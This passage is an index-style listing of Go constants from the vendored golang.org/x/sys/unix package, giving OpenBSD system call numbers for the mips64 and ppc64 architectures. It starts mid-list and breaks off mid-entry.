constant SYS_MSGGET (line 164) | SYS_MSGGET = 225 constant SYS_MSGSND (line 165) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 166) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 167) | SYS_SHMAT = 228 constant SYS_SHMDT (line 168) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 169) | SYS_MINHERIT = 250 constant SYS_POLL (line 170) | SYS_POLL = 252 constant SYS_ISSETUGID (line 171) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 172) | SYS_LCHOWN = 254 constant SYS_GETSID (line 173) | SYS_GETSID = 255 constant SYS_MSYNC (line 174) | SYS_MSYNC = 256 constant SYS_PIPE (line 175) | SYS_PIPE = 263 constant SYS_FHOPEN (line 176) | SYS_FHOPEN = 264 constant SYS_PREADV (line 177) | SYS_PREADV = 267 constant SYS_PWRITEV (line 178) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 179) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 180) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 181) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 182) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 183) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 184) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 185) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 186) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 187) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 188) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 189) | SYS_SHMGET = 289 constant SYS_SEMOP (line 190) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 191) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 192) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 193) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 194) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 195) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 196) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 197) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 198) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 199) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 200) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 201) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 202) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 203) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 204) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 205) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 206) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 207) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 208) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 209) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 210) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 211) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 212) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 213) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 214) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 215) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 216) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 217) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_mips64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_MSYSCALL (line 46) | SYS_MSYSCALL = 37 constant SYS_STAT (line 47) | SYS_STAT = 38 constant SYS_GETPPID (line 48) | SYS_GETPPID = 39 constant SYS_LSTAT (line 49) | SYS_LSTAT = 40 constant SYS_DUP (line 50) | SYS_DUP = 41 constant SYS_FSTATAT (line 51) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 52) | SYS_GETEGID = 43 constant SYS_PROFIL (line 53) | SYS_PROFIL = 44 constant SYS_KTRACE (line 54) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 55) | SYS_SIGACTION = 46 constant SYS_GETGID (line 56) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 57) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 58) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 59) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 60) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 61) | SYS_FSTAT = 53 constant SYS_IOCTL (line 62) | SYS_IOCTL = 54 constant SYS_REBOOT (line 63) | SYS_REBOOT = 55 constant SYS_REVOKE (line 64) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 65) | SYS_SYMLINK = 57 constant SYS_READLINK (line 66) | SYS_READLINK = 58 constant SYS_EXECVE (line 67) | SYS_EXECVE = 59 constant SYS_UMASK (line 68) | SYS_UMASK = 60 constant SYS_CHROOT (line 69) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 70) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 71) | SYS_STATFS = 63 constant SYS_FSTATFS (line 72) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 73) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 74) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 75) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 76) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 77) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 78) | SYS_GETITIMER = 70 constant SYS_SELECT (line 79) | SYS_SELECT = 71 constant SYS_KEVENT (line 80) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 81) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 82) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 83) | SYS_MADVISE = 75 constant SYS_UTIMES (line 84) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 85) | SYS_FUTIMES = 77 constant SYS_GETGROUPS (line 86) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 87) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 88) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 89) | SYS_SETPGID = 82 constant SYS_FUTEX (line 90) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 91) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 92) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 93) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 94) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 95) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 96) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 97) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 98) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 99) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 100) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 101) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 102) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 103) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 104) | SYS_SOCKET = 97 constant SYS_CONNECT (line 105) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 106) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 107) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 108) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 109) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 110) | SYS_SIGRETURN = 103 constant SYS_BIND (line 111) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 112) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 113) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 114) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 115) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 116) | SYS_PPOLL = 109 constant SYS_PSELECT (line 117) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 118) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 119) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 120) | SYS_UNVEIL = 114 constant SYS___REALPATH (line 121) | SYS___REALPATH = 115 constant SYS_GETSOCKOPT (line 122) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 123) | SYS_THRKILL = 119 constant SYS_READV (line 124) | SYS_READV = 120 constant SYS_WRITEV (line 125) | SYS_WRITEV = 121 constant SYS_KILL (line 126) | SYS_KILL = 122 constant SYS_FCHOWN (line 127) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 128) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 129) | SYS_SETREUID = 126 constant SYS_SETREGID (line 130) | SYS_SETREGID = 127 constant SYS_RENAME (line 131) | SYS_RENAME = 128 constant SYS_FLOCK (line 132) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 133) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 134) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 135) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 136) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 137) | SYS_MKDIR = 136 constant SYS_RMDIR (line 138) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 139) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 140) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 141) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 142) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 143) | SYS_NFSSVC = 155 constant SYS_GETFH (line 144) | SYS_GETFH = 161 constant SYS___TMPFD (line 145) | SYS___TMPFD = 164 constant SYS_SYSARCH (line 146) | SYS_SYSARCH = 165 constant SYS_PREAD (line 147) | SYS_PREAD = 173 constant SYS_PWRITE (line 148) | SYS_PWRITE = 174 constant SYS_SETGID (line 149) | SYS_SETGID = 181 constant SYS_SETEGID (line 150) | SYS_SETEGID = 182 constant SYS_SETEUID (line 151) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 152) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 153) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 154) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 155) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 156) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 157) | SYS_MMAP = 197 constant SYS_LSEEK (line 158) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 159) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 160) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 161) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 162) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 163) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 164) | SYS_GETPGID = 207 constant SYS_UTRACE (line 165) | SYS_UTRACE = 209 constant SYS_SEMGET (line 166) | SYS_SEMGET = 221 constant SYS_MSGGET (line 167) | SYS_MSGGET = 225 constant SYS_MSGSND (line 168) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 169) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 170) | SYS_SHMAT = 228 constant SYS_SHMDT (line 171) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 172) | SYS_MINHERIT = 250 constant SYS_POLL (line 173) | SYS_POLL = 252 constant SYS_ISSETUGID (line 174) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 175) | SYS_LCHOWN = 254 constant SYS_GETSID (line 176) | SYS_GETSID = 255 constant SYS_MSYNC (line 177) | SYS_MSYNC = 256 constant SYS_PIPE (line 178) | SYS_PIPE = 263 constant SYS_FHOPEN (line 179) | SYS_FHOPEN = 264 constant SYS_PREADV (line 180) | SYS_PREADV = 267 constant SYS_PWRITEV (line 181) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 182) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 183) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 184) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 185) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 186) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 187) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 188) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 189) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 190) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 191) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 192) | SYS_SHMGET = 289 constant SYS_SEMOP (line 193) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 194) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 195) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 196) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 197) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 198) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 199) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 200) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 201) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 202) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 203) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 204) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 205) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 206) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 207) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 208) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 209) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 210) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 211) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 212) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 213) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 214) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 215) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 216) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 217) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 218) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 219) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 220) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_ppc64.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 15) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 16) | SYS___TFORK = 8 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 19) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 20) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 21) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 22) | SYS_MKNOD = 14 constant SYS_CHMOD (line 23) | SYS_CHMOD = 15 constant SYS_CHOWN (line 24) | SYS_CHOWN = 16 constant SYS_OBREAK (line 25) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 26) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 27) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 28) | SYS_GETPID = 20 constant SYS_MOUNT (line 29) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 30) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 31) | SYS_SETUID = 23 constant SYS_GETUID (line 32) | SYS_GETUID = 24 constant SYS_GETEUID (line 33) | SYS_GETEUID = 25 constant SYS_PTRACE (line 34) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 35) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 36) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 37) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 38) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 39) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 40) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 41) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 42) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 43) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 44) | SYS_SYNC = 36 constant SYS_STAT (line 45) | SYS_STAT = 38 constant SYS_GETPPID (line 46) | SYS_GETPPID = 39 constant SYS_LSTAT (line 47) | SYS_LSTAT = 40 constant SYS_DUP (line 48) | SYS_DUP = 41 constant SYS_FSTATAT (line 49) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 50) | SYS_GETEGID = 43 constant SYS_PROFIL (line 51) | SYS_PROFIL = 44 constant SYS_KTRACE (line 52) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 53) | SYS_SIGACTION = 46 constant SYS_GETGID (line 54) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 55) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 56) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 57) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 58) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 59) | SYS_FSTAT = 53 constant SYS_IOCTL (line 60) | SYS_IOCTL = 54 constant SYS_REBOOT (line 61) | SYS_REBOOT = 55 constant SYS_REVOKE (line 62) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 63) | SYS_SYMLINK = 57 constant SYS_READLINK (line 64) | SYS_READLINK = 58 constant SYS_EXECVE (line 65) | SYS_EXECVE = 59 constant SYS_UMASK (line 66) | SYS_UMASK = 60 constant SYS_CHROOT (line 67) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 68) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 69) | SYS_STATFS = 63 constant SYS_FSTATFS (line 70) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 71) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 72) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 73) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 74) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 75) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 76) | SYS_GETITIMER = 70 constant SYS_SELECT (line 77) | SYS_SELECT = 71 constant SYS_KEVENT (line 78) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 79) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 80) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 81) | SYS_MADVISE = 75 constant SYS_UTIMES (line 82) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 83) | SYS_FUTIMES = 77 constant SYS_GETGROUPS (line 84) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 85) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 86) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 87) | SYS_SETPGID = 82 constant SYS_FUTEX (line 88) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 89) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 90) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 91) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 92) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 93) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 94) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 95) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 96) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 97) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 98) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 99) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 100) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 101) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 102) | SYS_SOCKET = 97 constant SYS_CONNECT (line 103) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 104) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 106) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 107) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 108) | SYS_SIGRETURN = 103 constant SYS_BIND (line 109) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 110) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 111) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 112) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 113) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 114) | SYS_PPOLL = 109 constant SYS_PSELECT (line 115) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 116) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 117) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 118) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 119) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 120) | SYS_THRKILL = 119 constant SYS_READV (line 121) | SYS_READV = 120 constant SYS_WRITEV (line 122) | SYS_WRITEV = 121 constant SYS_KILL (line 123) | SYS_KILL = 122 constant SYS_FCHOWN (line 124) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 125) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 126) | SYS_SETREUID = 126 constant SYS_SETREGID (line 127) | SYS_SETREGID = 127 constant SYS_RENAME (line 128) | SYS_RENAME = 128 constant SYS_FLOCK (line 129) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 130) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 131) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 132) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 133) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 134) | SYS_MKDIR = 136 constant SYS_RMDIR (line 135) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 136) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 137) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 138) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 139) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 140) | SYS_NFSSVC = 155 constant SYS_GETFH (line 141) | SYS_GETFH = 161 constant SYS_SYSARCH (line 142) | SYS_SYSARCH = 165 constant SYS_PREAD (line 143) | SYS_PREAD = 173 constant SYS_PWRITE (line 144) | SYS_PWRITE = 174 constant SYS_SETGID (line 145) | SYS_SETGID = 181 constant SYS_SETEGID (line 146) | SYS_SETEGID = 182 constant SYS_SETEUID (line 147) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 148) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 149) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 150) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 151) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 152) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 153) | SYS_MMAP = 197 constant SYS_LSEEK (line 154) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 155) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 156) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 157) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 158) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 159) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 160) | SYS_GETPGID = 207 constant SYS_UTRACE (line 161) | SYS_UTRACE = 209 constant SYS_SEMGET (line 162) | SYS_SEMGET = 221 constant SYS_MSGGET (line 163) | SYS_MSGGET = 225 constant SYS_MSGSND (line 164) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 165) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 166) | SYS_SHMAT = 228 constant SYS_SHMDT (line 167) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 168) | SYS_MINHERIT = 250 constant SYS_POLL (line 169) | SYS_POLL = 252 constant SYS_ISSETUGID (line 170) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 171) | SYS_LCHOWN = 254 constant SYS_GETSID (line 172) | SYS_GETSID = 255 constant SYS_MSYNC (line 173) | SYS_MSYNC = 256 constant SYS_PIPE (line 174) | SYS_PIPE = 263 constant SYS_FHOPEN (line 175) | SYS_FHOPEN = 264 constant SYS_PREADV (line 176) | SYS_PREADV = 267 constant SYS_PWRITEV (line 177) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 178) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 179) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 180) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 181) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 182) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 183) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 184) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 185) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 186) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 187) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 188) | SYS_SHMGET = 289 constant SYS_SEMOP (line 189) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 190) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 191) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 192) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 193) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 195) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 196) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 197) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 198) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 199) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 200) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 201) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 202) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 203) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 204) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 205) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 206) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 207) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 208) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 209) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 210) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 